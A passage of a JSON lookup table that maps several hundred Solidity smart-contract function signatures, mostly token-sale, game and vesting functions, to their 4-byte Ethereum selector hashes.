"fundingEndUnixTimestamp()": "0x802644a4", "TotalTOkenSupply()": "0x46601278", "tranches()": "0xebf04917", "mintFeeNumerator()": "0x8d93eac2", "mainSaleTime()": "0xd496bde4", "out4Done()": "0xdf9f3139", "getCurrEthValue()": "0xb509c090", "timeOfLastBlock()": "0xf02f85c5", "maxDecreasePct()": "0xf336bc7e", "endICOp3()": "0x657d38b8", "maxIceDragonsCount()": "0x911644fa", "rarityMultiplier()": "0x8838af8a", "TEAM_TOKENS()": "0x81ff4d0b", "noOfTokenAlocatedPerICOPhase()": "0x7dae6e95", "currentMideTokenTime()": "0x00d4b768", "block24h()": "0x5a2791ed", "finalizedRefund()": "0xc2e5d950", "maxCap_MInt()": "0xfe97e481", "rateTier3()": "0xb950f0a0", "c_MinInvestmentInCents()": "0xae307098", "prepareCrowdsale()": "0xe084a819", "platformTokenSupply()": "0x3fdb705b", "largestPro()": "0x2fe6a47c", "summJenkins()": "0x146e9329", "saleStartDate()": "0x8973123c", "bonusCompaignOpen()": "0x7aa2bcd6", "allowChangePrice()": "0xa25287c5", "sellerfeeDivide()": "0x4b21a587", "totalNumberOfScammers()": "0x2104cdd2", "firstReserveAllocation()": "0x6f4618d8", "ico4Max()": "0xb1202774", "balancesInitialized()": "0x421ed7dd", "getRandomPrice()": "0x8e514018", "growthReserve()": "0xb1871886", "proofOfSMS()": "0x0b7d1de1", "totalTaxed()": "0x37fbec96", "chanceNo()": "0xe2c5449e", "leftVotes()": "0xcb1faac1", "GDCNumber1()": "0x4d4549fb", "startingEtherValue()": "0xf6e5e112", "argumentCount()": "0x44ef231b", "maxContributionWei()": "0xe5f6186d", "ethRate()": "0xd2d93f90", "walletC()": "0x57a756d3", "statusQuery()": "0x5f7f9482", "publicStart()": "0xa5f4c6ff", "_CROWDSALE_PAUSED()": "0xf8058bdf", "BONUS_MAX_DURATION()": "0x9b0c1e51", "lastRoundEndTimestamp()": "0x97e12b0d", "VRCOIN_DECIMALS()": "0x63d7edb9", "getCertificate()": "0xae15eb8e", "burnPercentageDefault()": "0x4b96f855", "tokensRedeemed()": "0x89cbc416", "startTimeSale3()": "0x7f5341da", "getTotalInvestedEther()": "0xdc9ebff7", "_endBetBlock()": "0x7a83e89e", "firstCrowdSaleEndDate()": "0xfc01157c", "wuxiaMasterPrice()": "0xd644c46f", "multiplicator()": "0x00fa081a", "allowDelegate()": "0x1693b85d", "numberOfGames()": "0xf6928070", "ETH_RECEIVED_CAP()": "0xd8e30740", "BlockMined()": "0xc64743d5", "receiveFee()": "0xe18b7fcf", "resumeBlockNumber()": "0xa3787858", "getSaleData()": "0x7d7fa215", "optionTotalTimes()": "0x3dd2e0f0", "maxTokensAmount()": "0x0a384665", "targetWei()": "0x18051c4a", "crowdsaleProgress()": "0x013dbf17", "feeTakeExporter()": "0x205d0063", "startPresaleDate()": "0xe08a5f9e", "sumElements(uint128[])": "0x1c857765", "numberOfTokenIds()": "0xdc47b3c1", "MAX_COMMISSION()": "0xae97dde8", "maxContributionAmount()": "0x19cc1ec4", "softCapAmount()": "0xfb27961c", "walletBeneficiary()": "0x429d6a69", "window1TokenCreationCap()": "0x89d67775", "dispatch()": "0xe9c4a3ac", "etherWeiRate()": "0x118cbccb", "maxPaysPer()": "0x28c4b676", "goalMet()": "0xb8087ac0", "setTypeAdvantages()": "0x33d24dc4", "PRE_ICO_RATE()": "0xf5b9644c", "refundPoll()": "0xd66f146d", "MAX_SUPPLY_USPN()": "0x7bbfbaee", "issuedSupplyRatio()": "0xc24e1fc1", "TotalHoldersAmount()": "0xbb0ce7d3", "weekPot()": "0xa0326040", "masterresellercontract()": "0x179a5480", "WALLET_SALE()": "0x4c176b21", "WineryOperations()": "0x76e5c0ca", "setWinery(address,address,bool)": "0x9ccd7d86", "setProducer(address,address,bool)": "0x9c0953cf", "setRegulator(address,address,bool)": "0x03a77c7a", "getOffChainIdentity(address,address)": "0x3c32d8ef", "setUser(address,address,string,string,bool,bool,bool)": "0xa804cc7d", "Commons()": "0x7de8bb63", "Zakat()": "0x85007e54", "ZeusToken()": "0x3cb4986a", "finishPrivateSaleAndStartPreSale(address,uint256,uint256,uint256)": "0xf575c810", "startPrivateSale(address,uint256,uint256)": "0x2c29eedd", "getTokenPriceUSDWEI(uint256)": "0xba3f8f2c", "transferMintship(address)": "0xf83064c7", "Bithenet()": "0x5e6db193", "withdrawBuildingTokens(address)": "0xf54b384d", "VCcoin()": "0x1d3e43c8", "poolSize()": "0x4ec18db9", "BitcoinUnicorn()": "0xb078ffe8", "userHeldTill(address)": "0x728cbc44", "approvedAmount(address)": "0xee0446b2", "MOOVIN(uint256,string,string)": "0xbdb10825", "CNYToken()": "0x34d0cb6d", "BitcoinPluse()": "0x1958623f", "balancesImporter2()": "0x2dde1911", "SetState(uint256)": "0x3ee5313f", "startTokensSale(uint256,uint256,uint256)": "0x02ed26d1", "Cryptoloans()": "0x6f5f8f74", "newGuard()": "0x65688cc9", "forbid(address,address,bytes32)": "0x2bc3217d", "permit(address,address,bytes32)": "0xcbeea68c", "forbid(bytes32,bytes32,bytes32)": "0x79d88d87", "permit(bytes32,bytes32,bytes32)": "0xf0217ce5", "BLOCKPIX_Coin()": "0x6bea9d81", "PoseidonQuark()": "0xfba74490", "fundingStatus()": "0x3fb23865", "startTokenSale(uint256,uint256)": "0xebbfb994", "pauseTokenSale()": "0xf20f24ec", "unPauseTokenSale()": "0xc353c2de", "allocateForRefund()": "0xa2119a3a", "numberOfTokensLeft()": "0x27ea06b8", "PillarToken(address,address)": "0x4acf8867", "UnsoldAllocation(uint256,address,uint256)": "0x79147d07", "USDXCoin()": "0x327b95b5", "lindyhanCoin()": "0x42095679", "CrowdsaleToken(address,string,string,uint8,uint256,bool)": "0x12dc5ca0", "leftoverWeiAmount(address)": "0xd83d2afc", "tokenPurchaseAmount(address)": "0x5a4bffb8", "contributionAmount(address)": "0x086b60dd", "tokensSold()": "0x518ab2a8", "crowdsaleEnded()": "0x2367f35d", "firstPriceChange()": "0x5f0379f5", "crowdsaleActive()": "0x0b87cf10", "changeInterval()": "0xe20acc79", "capAmount()": "0xe93f57b9", "tokensPerEth()": "0xcbdd69b5", "withdrawLeftoverWei()": "0x9fac6ddc", "setTokens()": "0x559ed339", "withdrawOwnerEth()": "0x0c1ca1ba", "sendPurchase()": "0x67532c8e", "MenovaToken()": "0x49813e26", "ChefToken()": "0x442d31ca", "releaseAdvisorsTeamTokens()": "0xdf0c428c", "setAdvisorsTeamAddress(address)": "0x36d03356", "setCharityAddress(address)": "0x0c9be46d", "setCookUpFee(uint256)": "0x0786f01e", "setCharityDonation(uint256)": "0xc2edec0b", "servicePaymentWithCharityPercentage(address,uint256)": "0xbd74dc9d", "LUV_Crowdsale()": "0xb5f59a92", "LUVTOKEN()": "0x51193bad", "UBSI()": "0xc5b85eb8", "XXXChain()": "0x26f78835", "addDeal(address,address,address,uint256,uint256,uint256,uint256,string,uint256,uint256,bool)": "0x77daeb80", "VarnixToken()": "0xd99f8bd8", "MoonTrail()": "0xd5b014f8", "MoonTokenERC20(uint256,string,string)": "0xfc178f2a", "GoalHitWithdrawl()": "0x984877b0", "PlatoPresale()": "0x77b77a4f", "getMyChicken()": "0x25caaa37", "getFreeChicken()": "0xe7212728", "BitSelectArrojado()": "0x87a9be0d", "Blockkonnect()": "0xfac9d2c7", "ArenaplayToken()": "0xad2c1632", "GCTToken()": "0x8cb09d4d", "createWallets(uint256)": "0x59c3f7f0", "setForward(address)": "0x57acc118", "CCICoin()": "0xabb151c8", "Zinoder()": "0x9189edd2", "iCashToken()": "0x0566c979", "closeEXORImports()": "0xf98cbf76", "BFEXToken()": "0x65536ab3", "createAmountFromEXORForAddress(uint256,address)": "0x0b56f01c", "manuallySetNumRewardsAvailableForChildAddress(address,address,uint256)": "0x827e4cf1", "convertToELIX(uint256,address)": "0x0b6e6511", "setELIXAddress(address)": "0xa4d33646", "elixor()": "0xe8a43960", "removeSpecialOffer(address)": "0xfcc47803", "addSpecialOffer(address,uint8)": "0x32e12734", "distributeIncomeEther()": "0xb58fc3e7", "getDepositID(address)": "0x3469a55b", "deleteDeposit(address)": "0x9c83a1e3", "nextLotteryTTWTokenId3()": "0x4403e2ab", "getNCSTotalSupply()": "0xa5bbc311", "ETHERREDSupply()": "0x0af23be2", "periodPreITO_tokenPriceUSD()": "0xc5b2429d", "GlobalAmountCapHard()": "0xa883aab3", "startDayOneTime()": "0xfa848fb0", "unClaimedEther()": "0xa074d5ee", "affAddr_()": "0x2dd78759", "processFundingFailedFinished()": "0xbeeb0578", "activationTime()": "0xda4493f6", "motd()": "0x5aab4ac8", "numberOfInvestorsToWithdraw()": "0x99d67084", "privateIcoBonus()": "0x424f9947", "previousprice()": "0x3ef06b6b", "getOverall()": "0x3b470582", "VESTING_DATE()": "0x9a406338", "currentTotalBuyin()": "0x9ff390c1", "move()": "0x3ec48a2e", "genesisBlock()": "0x4cdc9c63", "annualManagementFee()": "0xdc7049bf", "immlaToken()": "0x809a812c", "isInMainSale()": "0x5a2fe63a", "emergencyRefund()": "0x16bfe25c", "CANONICAL_PRICEFEED()": "0x788fa540", "allowMoveTokens()": "0x337a8cdb", "SOFT_CAP()": "0xb652dc2f", "reconciliationDate()": "0x1094252e", "wormholeIsOpen()": "0x997e02d9", "safetyWallet()": "0x607b9f97", "minimumGoalInWei()": "0x1e391738", "dev2Wallet2Pct()": "0x3be1c410", "etherToSendBankRoll()": "0xd40d4d76", "withdrowTokens()": "0x6cb1630f", "lastCalculationRewardTime()": "0x4bd79ac1", "ROBReserveAllocation()": "0x1ff76f86", "MASTER_WALLET()": "0x3c2c4b5e", "vestingStart()": "0x254800d4", "validityDate()": "0x4c9599f2", "lowCapWei()": "0xf8b2e259", "firstContributorId()": "0xc96e83db", "PRESALE_END()": "0xe8b50802", "PRESALE_START_DATE()": "0xf0b80000", "withdrawDistributionCRL()": "0x4d720209", "airFropPot_()": "0x8dca05c9", "TYPE_FREIGHTER()": "0xb5917478", "actualPriceDivisor()": "0x749e93fc", "_maxPeriodSalesLimit()": "0x6d94425c", "listener()": "0x9551dd58", "m_state()": "0x6f4d80e5", "preSaleBonus4Amount()": "0xa93e0386", "reinvestDivies()": "0xab727094", "firstBonusTokensLimit()": "0x4518982c", "referalFundBalance()": "0x01ddfa9d", "pvpQueueSize()": "0xf73c8dfd", "marketingAllocation()": "0x15f0c220", "rateCent()": "0x1c6b69b7", "reservedFounder()": "0x158f7f5c", "phase2Duration()": "0x364d279a", "rewardAD()": "0x26bfd35c", "allowedSince()": "0xb167d512", "TEAM_TOKENS_RESERVED()": "0x2970c9c6", "getNextAvailableLevel()": "0x87874e02", "lockedAccountThresholdUsd()": "0x9eddc441", "tier1End()": "0xc8bffa93", "templateSupply()": "0x22dd9b8c", "shareholderIsToken()": "0x4cf95c21", "currentTokenCount()": "0x11b639d9", "rate1()": "0xcf854969", "rateAngelsDayEnd()": "0x02b5ecc8", "angelToken()": "0x9dc080d3", "contractStart()": "0x9aa13f04", "founders_address()": "0x38670cb4", "getRefBalSended()": "0x112d6b34", "recordContract()": "0x89698f02", "bonusWallet()": "0x18c1d9b2", "MAX_WITHDRAWAL()": "0x97ec642c", "lastDividendTime()": "0x7b5cc75d", "ownerPerThousandShareForBuying()": "0xa379e626", "wlDuration()": "0x8948fe67", "sysPer()": "0x0eea10b1", "airSender()": "0x7d720296", "minimumParticipation()": "0x043122bb", "NdexSupply()": "0xe489fc68", "crowdsaleUnpause()": "0xffa67f6c", "marketactive()": "0xca2cd9d3", "feesPool()": "0x6b259690", "securityTokenVersion()": "0x3876e6d3", "locker()": "0xd7b96d4e", "genesisCreation()": "0x4cf50009", "FOUNDER1()": "0xd16c4cf5", "AVAILABLE_BONUS2_SUPPLY()": "0xdc39537a", "ethReceivedPresaleTwo()": "0x63b82524", "ICOSupply()": "0x15b73a1d", "numHashTypes()": "0x40aee1a9", "SRNT_per_ETH()": "0xe9d7d79a", "finishCurrentGame()": "0xe72f7a78", "crowdsaleCap()": "0x4951a18f", "icoEtherReceivedPreFirstSale()": "0xba0a272b", "LIMITS_END_DATE()": "0x4e22102b", "sellDeadline1()": "0xe28a5e63", "CAECToken()": "0x9401c82b", "Planethereum(address,address)": "0x27c4bde8", "setEndAfterSecond(uint256)": "0xd023d32c", "transferExchange(uint256)": "0x29b84c9c", "batchExchange(address[])": "0xcff61fb6", "toExchange(address)": "0xf8d988d6", "freeze(address,uint256[],uint8[])": "0x662d2ec8", "transferMultiSameValue(address[],uint256)": "0xd97cec3f", "newGrant(address,address,uint256,uint256,uint256,uint256,bool)": "0xbdb81203", "doRandom(address[],address,uint256)": "0xc5dba811", "winnerSelect(uint256)": "0xbed03fdb", "pickWinner(bytes32,uint256)": "0x1966cdbe", "setPreIcoEndDate(uint256)": "0x6fa15c21", "mintBulk(address[],uint256[])": "0x7fd30df0", "XulCrowdsale(uint256,uint256,uint256,address)": "0xc3155201", "changePreIcoEndDate(uint256)": "0xe9d724e5", "XulToken()": "0x3046fe26", "ORGANIC(uint256,string,uint8,string)": "0x24667568", "updatepresaleRate(uint256)": "0x709a5359", "allocatePVT_InvTokens(address[],uint256[])": "0x4d831535", "updateInitialRate(uint256)": "0xd1c6f448", "withdrawSelect(address)": "0x37a31895", "luckyBuy(uint8)": "0x9d72d8d3", "buyDonation(address,uint8)": "0x0446e187", "DSNCOIN()": "0xf137c236", "KongQiCoin()": "0xdacd06fc", "PenCrowdsale(uint256,address,address)": "0x33d6c065", "Pen(address)": "0x29aab068", "ChooChooCoin()": "0x3d28ce75", "AywakeToken(address,address)": "0xd195bbd5", "group(address,uint256)": "0x041b8c3e", "mintWithMetadata(address,uint256,string)": "0x2d63f728", "StartGuess_wis(string,string)": "0xd79185d7", "Bittobit()": "0x83ff5bf2", "retry(address)": "0x5fb130af", "setClosedManually(bool)": "0xcaf6e1c9", "setPending(bool)": "0x8ae3beb2", "sendRTB(address,uint256)": "0x4030bc19", "BlockChainZB(uint256,string,string)": "0x6f13eb09", "checkChoice(uint8)": "0x366f77b7", "gameCountOf(address)": "0x13ffdbfc", "getProof(address,uint8,bytes32)": "0x4f11e07d", "reveal(uint256,uint8,bytes32)": "0x9a42f3aa", "createGame(bytes32,address)": "0xfe1f6a0b", "RpsGame()": "0x8dff1762", "amountWithTip(uint256)": "0x481dbaa4", "deactivateProject(address)": "0x0af95750", "activateProject(address)": "0x9047ad74", "getProject(address)": "0xf9870705", "createProject(string,address,address)": "0x88ff2dcc", "MINATOKU()": "0xc2d936d9", "XiiPay()": "0xcd8cdccd", "get_heap(uint256)": "0xf9f73135", "is_name_used(bytes32)": "0x09ef7085", "get_heaps(uint256)": "0x5f60ef47", "create(uint256,bytes32,uint256,uint256,uint256)": "0x37a47106", "TheBolthDAICO(address,address,address,address,address,address,address,address)": "0xa60c9cdb", "MissionToken(uint256,string,uint8,string)": "0x2af1616d", "XoloChain()": "0x6936c1cf", "subDomainOwner(string,string)": "0xf0d0dd3f", "topLevelDomainOwner(string)": "0x6969d216", "Bitcoin1()": "0x80766b68", "deleteSire(uint32)": "0x2da5a444", "setSireStop(uint32)": "0xa22ec476", "setRabbitSirePrice(uint32,uint256)": "0x462a8e05", "_transferMoneyMother(uint32,uint256)": "0x29ad4a34", "coolduwnUP(uint32)": "0xedfdd9d8", "createChildren(uint32,uint32)": "0xa13a7cee", "getGenomeChildren(uint32,uint32)": "0x63991a36", "createGennezise(uint32)": "0xfd5c6694", "transferNewBunny(address,uint32,uint256,uint256,uint32,uint32)": "0x65e21cb0", "giff(uint32,address)": "0x62075af4", "buyBunny(uint32)": "0xa210a676", "stopMarket(uint32)": "0xfb6c2b6f", "startMarket(uint32,uint256)": "0x59e4eec9", "currentPrice(uint32)": "0x308c0065", "setMoneyRange(uint256)": "0x553fd043", "setStepMoney(uint256)": "0xef229dc7", "getcoolduwn(uint32)": "0x06873418", "getBreed(uint32)": "0x433bd924", "getBunny(uint32)": "0x70a7e2dd", "getOwnerGennezise(address)": "0x7ea2bbac", "getGiffBlock(uint32)": "0x193d5b77", "getRabbitDNK(uint32)": "0x4fd839c6", "getRabbitMotherSumm(uint32)": "0x27904ee0", "getRabbitMother(uint32)": "0xdf4b2970", "getTotalSalaryBunny(uint32)": "0x2a335c17", "getMotherCount(uint32)": "0x1ee55080", "setMotherCount(uint32)": "0x8134064b", "setRabbitMother(uint32,uint32)": "0x79ded380", "getTokenOwner(address)": "0xdc17c9ca", "setTimeRangeGen0(uint256)": "0x3ec27c4a", "addTokenList(address,uint32)": "0x254439fe", "getSirePrice(uint32)": "0x4b72bbaf", "removeTokenList(address,uint32)": "0x336120fe", "setPriv(address)": "0x4e2fd44e", "mixGenesRabbits(uint256,uint256,uint256)": "0x972030bb", "isUIntPrivate()": "0xccb0893d", "mixDNK(uint256,uint256,uint256)": "0x27c5e534", "getNewRabbit(address)": "0x8f90f2bb", "cancelMigration()": "0x10639ea0", "requestForMigration(address)": "0xbef566ef", "suicideContract()": "0x3abc2106", "setMaxLeaders(uint256)": "0x9e7d101e", "dropLast()": "0x4e30506f", "popLeader(address)": "0x4cb7dd6f", "getLeader(address)": "0xe74d6d1b", "resetUrls(bool,bool)": "0x28abda51", "setUrls(string,string)": "0xf564dca9", "Etherboard()": "0x0c6b1324", "SimpleTingToken()": "0x7dcd277b", "getData_5()": "0x60668e58", "setData_5(string)": "0x34771f81", "getData_4()": "0xc4057e61", "setData_4(string)": "0x8a1d42f4", "getData_3()": "0x7539189c", "setData_3(string)": "0x38a2cd0f", "getData_2()": "0x7ff2acb7", "setData_2(string)": "0x2660b56c", "getData_1()": "0x7ce6e4ca", "setData_1(string)": "0xbedda13f", "transfertOwnership(address)": "0xd912d248", "NUGOLD()": "0xc212cffa", "calculator(uint8,uint256,uint256)": "0xbcc94309", "getTotalTokenWithdrawByAddress(address)": "0xe265c5e2", "getTotalTokenDepositByAddress(address)": "0x4a7004b9", "getCountStakesToken()": "0x98dd4b7c", "getCountTransferInsToken(address,address)": "0x5f75cb6b", "getTokenTransferInsByAddress(address,address,uint256)": "0xdb39a8e8", "getTokenStakeByIndex(uint256)": "0x5eda232d", "changeRates(uint8,uint256)": "0x2f5867b3", "withdrawOwner(uint256)": "0x6ef98b21", "cancel(uint256,address,address)": "0xcc0b5a5f", "balanceOfToken(address)": "0xb99152d0", "removeMemberArrayToken(address,address,uint256)": "0x7380fbf3", "clearTransferInsToken(address)": "0x128a3765", "withdrawToken(address,address)": "0x3aeac4e1", "validWithdrawToken(address,address,uint256)": "0x44cc7f5e", "setContractUser(address,bool)": "0x9660ab3a", "ContractStakeToken(address)": "0x3b6e2970", "create_a_new_market(address,address,uint256,uint256,uint256)": "0x61c2e349", "get_amount_minus_fee(uint256)": "0x307ca045", "get_amount_buy(uint256)": "0x7b5825d5", "get_amount_sell(uint256)": "0xa45230ec", "transferETHFromContract(address,uint256)": "0x7dd02c8e", "transferETHToContract()": "0x61f8cdd6", "transferTokensFromContract(address,uint256)": "0xd0973af8", "transferTokensThroughProxyToContract(address,address,uint256)": "0x48c40dbd", "BlockspacesToken()": "0x2c92e5b7", "getBonusRate(uint256)": "0xe37cd202", "internalAction()": "0xa54d396e", "internalCheck()": "0x851d46f3", "isServiceAccount()": "0x5432202a", "changeServiceAccount(address)": "0xd333ec79", "Checkable()": "0xae0e8725", "retrieveTokens(address)": "0xac4ddd9f", "setMultisigVault(address)": "0x14f80083", "setStart(uint256)": "0xf6a03ebf", "setHardCap(uint256)": "0xd18d944b", "authorizedCreateTokens(address,uint256)": "0x528d4156", "setAltDeposit(uint256)": "0xbad4d623", "setAuthorizeMintToken(uint256,int256)": "0x058618f8", "startTrading()": "0x293230b8", "addAuthorized(address)": "0xcf1c316a", "getAuthorizer(uint256)": "0x3a3e8e84", "Authorizable()": "0xae954790", "transferTokensFromVault(address,uint256)": "0xd2a17959", "removedSalesAgent()": "0x35e6e5b6", "claimSalesAgent()": "0x6d64a472", "setSalesAgent(address)": "0x4dbb1964", "vestedAmount(address)": "0x384711cc", "releasableAmount(address)": "0x1726cbc8", "getInvestment(address)": "0x146b58df", "init(address[],uint256[],uint256,address)": "0xc5a0ca8f", "InfimonkCoin()": "0x835409f0", "FiduxaCoinCrowdsale(uint256,uint256,uint256,uint256,uint256,address)": "0x5a1b96a2", "getTokenAmount(uint256)": "0xc2507ac1", "Crowdsale(uint256,uint256,uint256,uint256,uint256,address)": "0xe65ca2fe", "getReferralOf(address)": "0x9478a7c9", "isAllowed(address)": "0xbabcc539", "addReferralOf(address,address)": "0xa014b9bd", "removeInvestorFromWhiteList(address)": "0x984fba49", "addInvestorToWhiteList(address)": "0x4f76a077", "InvestorWhiteList()": "0xe5f643cf", "getEggsSinceLastHatch(address)": "0xd7c8843b", "getMyEggs()": "0x43ce7422", "getHipstermasterReq()": "0x1c235f5f", "getMyHipster()": "0xb272fa2d", "getFreeHipster()": "0x0744c56b", "seedMarket(uint256)": "0x3b653755", "calculateEggBuySimple(uint256)": "0x7e56fde5", "calculateEggBuy(uint256,uint256)": "0x26fd8422", "calculateEggSell(uint256)": "0x8e316327", "buyEggs()": "0x4f74acfe", "sellEggs()": "0x3955f0fe", "hatchEggs(address)": "0x3ec862a8", "becomeHipstermaster()": "0x4de0089a", "HipsterFarmer()": "0xcbf97572", "Ether2Gen()": "0x0f9ce471", "getTotalVotes()": "0x9a0e7d66", "LimbToken()": "0xb7f603ff", "Tresdk()": "0x9c75089f", "EOSToken()": "0xc7ea8a68", "EOSOwned()": "0x4cc62409", "TetherToken()": "0x5aeb45dc", "Airdrop(address[],uint256[])": "0xc558ae6b", "randomGenes()": "0xcaf6fe1a", "sponsor(uint256,address)": "0x63ceb60d", "withdrawTipBalance(uint256,address,uint256)": "0xa1e93b63", "addTipBalance(uint256,address,uint256)": "0x730e90b7", "getTipperPercentage(uint256,uint256)": "0xfddaf68a", "addToTipperQueue(uint256,address)": "0x3bea92a3", "inTipperQueue(uint256,address)": "0x533ae8e5", "put(address,uint256)": "0x7f8d53c6", "MANNCOIN()": "0x88e694aa", "stopBid()": "0xba723f99", "showLastBidValue()": "0x804f82d3", "showCurrentBidValue()": "0xcfdd4520", "showLastBidder()": "0xe345f098", "showBidder()": "0x35eb8479", "takeBackMoney()": "0xe428fd5f", "SEARCH()": "0x77e8a52e", "Dodol()": "0x57da9166", "EMJAC()": "0x6f4be234", "MyAdvancedToken(uint256)": "0x7c96f680", "initializeSupply(uint256,uint256,uint256)": "0x49582a20", "EYInnovationCoin()": "0xa73381d5", "BACToken()": "0xb3dedf5c", "nameAvailable(string)": "0x82bbdbec", "keys(address)": "0x670d14b2", "account(address)": "0x73b9aa91", "fuckTest()": "0xf1c3dd3e", "addused(uint256)": "0xe31d3460", "dyn_call(address,bytes)": "0x7b77bbc8", "batchWrite(uint256,uint256,string)": "0xabc40f41", "AssToken()": "0x4344f73d", "setNewOwner(address,uint256)": "0x7091e0c5", "addnewOwner(address)": "0x2902b093", "getList()": "0x942b765a", "addDataToList(bytes32,bytes32,bytes32,bytes32)": "0x9c9ef978", "HashnodeProCoin()": "0xf8a46568", "getcapname()": "0xf2c8257e", "setcapname(string)": "0xf53f43d9", "AliParsafar()": "0x4a765625", "payReward(address,address,uint256,uint256)": "0x37831b97", "setupAirDrop(bool,uint256,uint256)": "0x8213dafc", "ITBITSToken()": "0xa5de12ab", "view_last_result(address,address)": "0x0c80d6dd", "resolve(uint8)": "0xa0270dbc", "win(uint8)": "0x345a4423", "mora(uint8)": "0x86e97442", "YUNXIN3Token(uint256,string,uint8,string)": "0x56a9399d", "createGen0TokenWithDna(uint256)": "0x4113d05b", "ownerSetBankroll(address)": "0x7c67ffe7", "ownerTransferZTH(address,uint256)": "0xca9defb7", "_finishBet(uint256)": "0x24272479", "calculateProfit(uint256,uint256)": "0xe972261d", "SendBobsCoin()": "0x6d4ee68f", "ZEROCoin()": "0xa0c66283", "WiggaToken()": "0xd49ce78d", "StopSale()": "0x7944875b", "StartSale(address,uint256,uint256,address,address,uint256,uint256,uint256)": "0x403639d5", "withdraw_internal(uint256[2],uint256[2],uint256[2][2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[4])": "0xa8928b45", "transaction_internal(uint256[2],uint256[2],uint256[2][2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[4])": "0x6b962c27", "deposit(uint256[2],uint256[2],uint256[2][2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256,string)": "0x8731a8d9", "deposit_internal(uint256[2],uint256[2],uint256[2][2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256,uint256)": "0x19b500ef", "add_commitment(uint256)": "0x9ac1f9a1", "get_size()": "0xb0670cc9", "get_root()": "0xa30c5f17", "getSha256_UInt(uint256,uint256)": "0xe0a62339", "get_merkle_proof(uint256)": "0xf82bffa0", "check_invalidator(uint256)": "0x2916f075", "register(uint256,string)": "0xa00fd3c8", "update_tree()": "0x38439bb6", "Manager(address,address,address)": "0x4d677d32", "medicaxess()": "0x8856cd84", "BIDDED()": "0xb1fe5f58", "SetFreeDCT(uint256)": "0x009e2297", "SetupWWC(string,string,uint256,uint256,uint256,address,address,uint256)": "0xe17e1a86", "WorldWideCoin()": "0xfbf82d31", "randomReward(uint256[])": "0x0410ec85", "IllusionDust()": "0x3797528e", "aa()": "0x8466c3e6", "getConversation(address,address,uint32)": "0xeb531996", "getNumMessages(address,address)": "0x9328bfc1", "send_message(address,string)": "0xf122ed60", "deductionToken(address,uint256)": "0x7c18a32f", "migratebyowner(address)": "0xb0d66291", "setTokenExchangeRate(uint256,uint256,uint256)": "0x93dfbbcb", "ShowNextCliff(address,uint256)": "0x7ce1db53", "ShowChargeCount(address)": "0x33ac67c3", "ShowChargeTime(address,uint256)": "0x7a62b77c", "ShowUnrelease(address,uint256)": "0x97f606eb", "ShowRelease(address,uint256)": "0xae22c1be", "totalBalanceOf(address)": "0x4b0ee02a", "calctime(uint256)": "0x04e86e15", "ShowTime()": "0x6d1a0d34", "ReleasableAmount(address,uint256)": "0x2a6d6c08", "CalcPeriod(address,uint256)": "0x193e06c4", "LockMechanism(address,uint256)": "0xfd71b579", "RESERVED_RESERVE_UNLOCK_AT()": "0xbf7c775e", "token1()": "0xd21220a7", "amount_bonus()": "0x93859188", "TIER2_RATE()": "0xf0a15f10", "spentToday()": "0xf059cf2b", "REGULAR_RATE()": "0x98dec601", "website()": "0xbeb0a416", "candidateExchange()": "0x4d49451c", "totalInvestedWei()": "0xcdf32cab", "votingData()": "0x113e2088", "affiliatesAllocAddress()": "0x6de09e28", "numberOfFarmers()": "0xf2729497", "unblockTransfer()": "0x87336473", "lifeFactor_v()": "0xe69d27a8", "GROWTH_BUMP()": "0xc43ae983", "badge_obj()": "0xcf1259d8", "inited()": "0x43c885ba", "TEAM_INCENTIVES_AMOUNT()": "0xd5c2d2b6", "ALLOC_PARTNER()": "0xa10b3ffd", "claimVotingProposal()": "0x2877c748", "preSaleMaxTokens()": "0x86ffe00f", "getVolumeDiscountsCount()": "0x90bb807e", "ethToUsdExchangeRate()": "0xb4f181c6", "weiMinimum()": "0xb7dc2a9f", "tokensAfterCrowdsale()": "0x128e87e0", "presaleBonusAddressColdStorage()": "0x1bfc596b", "thebank()": "0x5370a049", "TAIL()": "0xc628ddc3", "tier2Rate()": "0x6402efd3", "mlDevelopers()": "0xe31870dc", "petCardDataContract()": "0x83ff9bec", "withdrawStudios()": "0xb4d12bfa", "devOwed()": "0xbf37b8f1", "BasePrice()": "0x92a5f340", "min_value()": "0xb4fffa52", "voteB()": "0xfb32aedb", "initialRound()": "0x31f25330", "cryptaurToken()": "0x283ceee2", "secondWinnerTimestamp()": "0x67d49909", "teamETHUnlock3()": "0xdad86b45", "product1_sell()": "0xf7f8303b", "priceFeed()": "0x741bef1a", "growthTokensWallet()": "0x8b00c467", "SILVER_AMOUNT_TPT()": "0x861ec457", "END_TIME_PRESALE()": "0x36a26b99", "Strikes()": "0xb39c8739", "icoCheckup()": "0x78eba8fc", "dividendEndTime()": "0xe861c4f1", "preico_enddate()": "0xd8da708f", "stage1()": "0xcff3d4d8", "satLimit()": "0x1972172b", "ProcessRooms()": "0x81c92486", "getRateNow()": "0x982e5721", "ratePreSaleStage()": "0x7733f24f", "objectGloves()": "0x94a66df3", "REGULAR_TYPE2()": "0x7f5ba3cc", "PreSaleDistributed()": "0xc56fc9c1", "getProxyId()": "0xae25532e", "tokenPreSale()": "0x8c1e21da", "marketingAddr()": "0x3ff42b92", "isUIntPublic()": "0x7214d6c3", "phase8Price()": "0x8a699023", "UNLOCK_PERIOD()": "0x259a28cf", "proof_of_public_key2()": "0xcc0bb8e5", "ETERNAL_APPROVAL_VALUE()": "0x634eaff1", "metadataContract()": "0x35209821", "taxValue()": "0xc9894b5c", "maxSCount()": "0xf5878d40", "remainingBankroll()": "0xaf7296ec", "MediatorFees()": "0xfefacee1", "totalSupplyPrivateSale()": "0xfba90629", "stageOne()": "0x3c807878", "checkVotingForChangeBuySellPrice()": "0xedd7716a", "currBlock()": "0x45f32e77", "t_Michail()": "0x23ba3420", "limitation()": "0xb3c5209f", "marketorsTotalBalance()": "0x1b8fc6e4", "TEAM_TOKENS0()": "0x9c2625fd", "newGlobalChanceNo()": "0xb2481048", "token_wallet_address()": "0x9acf603b", "minSellRateInPrecision()": "0xe5702701", "teamInstantSent()": "0x75bfb140", "largestDonation()": "0x34fe5473", "toekensForTeam()": "0xd283833d", "SECCoinSold()": "0x5516b6c5", "Eth_Amount()": "0xb857a688", "totalMTPAllocated()": "0xfe06a915", "referralProgramOwner()": "0xa2252aaa", "rewardslength()": "0xc731e124", "AIRDROP_CLAIM_AMMOUNT()": "0x2e379264", 